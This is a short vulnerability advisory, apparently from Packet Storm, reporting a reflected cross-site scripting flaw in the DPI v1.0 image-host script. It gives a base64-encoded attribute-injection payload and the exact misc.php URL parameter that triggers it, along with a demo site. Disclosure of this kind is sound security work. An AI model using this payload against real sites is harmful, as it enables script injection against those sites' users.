DPI 1.0 Cross Site Scripting

2012-01-30T00:00:00
ID PACKETSTORM:109240
Type packetstorm
Reporter Red Security TEAM
Modified 2012-01-30T00:00:00

Description

                                        
                                            `#   
# Title : DPI v1.0 XSS Vulnerability  
# Author : Red Security TEAM  
# Date : 29/01/2012  
# Demo : http://www.piceye.com/  
# Download : http://www.image-host-script.com/download.php  
# Tested On : CentOS  
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM  
# Home : http://RedSecurity.COM  
#  
# Exploit :  
#   
# I : Encode your xss code to base 64 , Example : " onmouseover=prompt(0) bad=" is IiBvbm1vdXNlb3Zlcj1wcm9tcHQoMCkgYmFkPSI=  
# II : Then go to this link : http://server/misc.php?showseries=IiBvbm1vdXNlb3Zlcj1wcm9tcHQoMCkgYmFkPSI= , You can see your xss code has been run ;)  
#  
`